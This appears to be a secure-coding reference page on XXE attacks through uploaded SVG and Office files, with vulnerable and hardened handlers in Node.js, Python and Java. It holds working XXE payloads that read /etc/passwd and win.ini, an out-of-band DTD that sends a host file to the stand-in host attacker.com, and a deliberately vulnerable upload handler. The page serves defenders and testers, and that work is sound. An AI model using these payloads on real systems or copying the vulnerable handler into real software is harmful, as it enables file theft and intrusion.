🟠High7.5

File Upload XXE Vulnerabilities

XXE vulnerabilities in file upload functionality targeting XML-based file formats like SVG, DOCX, XLSX, and others.

CWE-611: Improper Restriction of XML External Entity ReferenceOWASP Top 10:2021 - A05: Security Misconfiguration

Overview

File upload functionality presents a unique XXE attack surface when applications accept and process XML-based file formats. Many modern document and image formats contain XML data that may be parsed insecurely:

Vulnerable File Formats:

SVG (Scalable Vector Graphics) - image files
DOCX, XLSX, PPTX (Office Open XML) - Microsoft Office documents
ODT, ODS, ODP (OpenDocument) - LibreOffice documents
PDF - may contain embedded XML metadata
RSS/Atom feeds
GPX (GPS Exchange Format)
KML (Keyhole Markup Language)
SOAP attachments

Attack Scenario:

User uploads crafted XML-based file
Backend parses XML without proper security controls
External entities are processed
File disclosure, SSRF, or DoS occurs

Why This Is Dangerous:

Developers may not realize file formats contain XML
File upload validation often checks only file extensions/MIME types
XML parsing may occur in background processing
Applications trust file content from authenticated users

SVG File XXE Attack

XMLmalicious.svg⚠️ Vulnerable
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="500" xmlns="http://www.w3.org/2000/svg">
  <text x="20" y="35" font-size="20">&xxe;</text>
</svg>

SVG Out-of-Band XXE

XMLoob-exfil.svg⚠️ Vulnerable
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
  <!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd">
  %remote;
]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
  <rect width="200" height="200" fill="red"/>
  <text x="10" y="100">Malicious SVG</text>
</svg>

<!-- xxe.dtd on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/log?d=%file;'>">
%eval;
%exfil;

DOCX File XXE Attack

Microsoft Office Open XML files (.docx, .xlsx, .pptx) are ZIP archives containing XML files. The main content is in word/document.xml (for DOCX):

Attack Steps:

Create/open DOCX file
Unzip the archive
Edit word/document.xml to include XXE payload
Rezip and upload

Vulnerable XML Inside DOCX:

XMLword/document.xml (inside malicious.docx)⚠️ Vulnerable
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:r>
        <w:t>&xxe;</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>

Vulnerable Node.js File Upload Handler

JavaScriptvulnerable-upload.js⚠️ Vulnerable
const express = require('express');
const multer = require('multer');
const libxmljs = require('libxmljs');
const fs = require('fs');

const app = express();
const upload = multer({ dest: 'uploads/' });

// Vulnerable: Parses uploaded SVG without security controls
app.post('/upload/svg', upload.single('file'), (req, res) => {
    if (!req.file) {
        return res.status(400).send('No file uploaded');
    }
    
    // Read uploaded file
    const xmlContent = fs.readFileSync(req.file.path, 'utf8');
    
    // VULNERABLE: Default libxmljs settings allow external entities
    try {
        const xmlDoc = libxmljs.parseXml(xmlContent);
        
        // Process SVG (e.g., resize, validate)
        res.send('SVG processed successfully');
    } catch (err) {
        res.status(500).send('Processing failed');
    }
});

Secure Node.js File Upload Handler

JavaScriptsecure-upload.js✓ Secure
const express = require('express');
const multer = require('multer');
const libxmljs = require('libxmljs');
const fs = require('fs');

const app = express();
const upload = multer({ 
    dest: 'uploads/',
    fileFilter: (req, file, cb) => {
        // Validate file type
        if (file.mimetype !== 'image/svg+xml') {
            return cb(new Error('Only SVG files allowed'));
        }
        cb(null, true);
    }
});

app.post('/upload/svg', upload.single('file'), (req, res) => {
    if (!req.file) {
        return res.status(400).send('No file uploaded');
    }
    
    const xmlContent = fs.readFileSync(req.file.path, 'utf8');
    
    try {
        // SECURE: Disable external entity loading
        const xmlDoc = libxmljs.parseXml(xmlContent, {
            noent: false,    // Disable entity substitution
            nonet: true,     // Disable network access
            dtdload: false,  // Disable DTD loading
            dtdvalid: false  // Disable DTD validation
        });
        
        // Additional validation: reject DOCTYPE
        if (xmlContent.includes('<!DOCTYPE')) {
            fs.unlinkSync(req.file.path); // Delete malicious file
            return res.status(400).send('DOCTYPE not allowed');
        }
        
        res.send('SVG processed securely');
    } catch (err) {
        fs.unlinkSync(req.file.path); // Clean up
        res.status(500).send('Processing failed');
    }
});

Secure Python SVG Processing

Pythonsecure_svg_upload.py✓ Secure
from flask import Flask, request
from defusedxml.lxml import fromstring
import os

app = Flask(__name__)

@app.route('/upload/svg', methods=['POST'])
def upload_svg():
    if 'file' not in request.files:
        return 'No file uploaded', 400
    
    file = request.files['file']
    
    # Validate file extension
    if not file.filename.endswith('.svg'):
        return 'Only SVG files allowed', 400
    
    # Read file content
    svg_content = file.read()
    
    try:
        # SECURE: Use defusedxml which blocks XXE by default
        svg_tree = fromstring(svg_content)
        
        # Additional validation: check for DOCTYPE
        if b'<!DOCTYPE' in svg_content:
            return 'Invalid SVG: DOCTYPE not allowed', 400
        
        # Process SVG safely
        # ...
        
        return 'SVG processed successfully', 200
        
    except Exception as e:
        return f'Processing failed: {str(e)}', 500

if __name__ == '__main__':
    app.run()

Detection and Prevention Strategies

Detection Indicators:

Uploaded files containing <!DOCTYPE declarations
Files with <!ENTITY definitions
Unusual outbound connections during file processing
Files significantly larger than expected for format
DOCTYPE references to external DTDs

Prevention Measures:

Disable XXE in Parsers: Configure XML parsers to reject external entities
Content Validation: • Reject files containing DOCTYPE declarations • Reject files with ENTITY definitions • Validate file structure against expected schema
File Type Controls: • Validate actual file content, not just extension • Use allowlist of permitted file formats • Consider converting XML-based formats to non-XML alternatives
Sandboxing: • Process uploaded files in isolated environment • Restrict network access from file processing servers • Run parsers with minimal privileges
Alternative Processing: • For images: convert SVG to raster format (PNG/JPEG) • For documents: extract text without full XML parsing • Use safer libraries that don't support external entities
Network Controls: • Block outbound connections from upload processing servers • Monitor for DNS queries during file processing • Alert on HTTP requests to external domains

Secure Java DOCX Processing

JavaSecureDOCXProcessor.java✓ Secure
import org.apache.poi.xwpf.usermodel.XWPFDocument;
import org.apache.poi.openxml4j.opc.OPCPackage;
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.FileInputStream;

public class SecureDOCXProcessor {
    
    public void processDocx(String filePath) throws Exception {
        // Apache POI with secure XML parser configuration
        
        // Configure secure XML factory for POI
        System.setProperty(
            "javax.xml.parsers.DocumentBuilderFactory",
            "com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderFactoryImpl"
        );
        
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        
        // Disable XXE
        factory.setFeature(
            "http://apache.org/xml/features/disallow-doctype-decl",
            true
        );
        factory.setFeature(
            "http://xml.org/sax/features/external-general-entities",
            false
        );
        factory.setFeature(
            "http://xml.org/sax/features/external-parameter-entities",
            false
        );
        factory.setExpandEntityReferences(false);
        
        // Process DOCX with secured parser
        try (FileInputStream fis = new FileInputStream(filePath)) {
            OPCPackage pkg = OPCPackage.open(fis);
            XWPFDocument doc = new XWPFDocument(pkg);
            
            // Extract and process text securely
            String text = doc.getText();
            System.out.println("Extracted text: " + text);
            
            doc.close();
            pkg.close();
        }
    }
}

Testing File Upload XXE

Test Methodology:

Identify XML-Based Formats: Determine which file formats the application accepts
Create Malicious Files: • SVG with inline XXE payload • DOCX with XXE in document.xml • XLSX with XXE in sharedStrings.xml • PDF with XXE in metadata
Test Detection: • Upload file with simple file:// entity • Upload file with HTTP callback for OOB detection • Monitor for outbound connections
Test Exfiltration: • Attempt to read /etc/passwd (Linux) • Attempt to read C:\windows\win.ini (Windows) • Use parameter entities for blind exfiltration
Verify Processing: • Check if file content is displayed/processed • Look for evidence of entity expansion • Test different file format variations

Tools:

SVG with XXE: Inkscape or text editor
DOCX/XLSX: 7zip to unzip, edit XML, rezip
XXE payloads: Burp Suite, custom scripts
OOB detection: Burp Collaborator, interactsh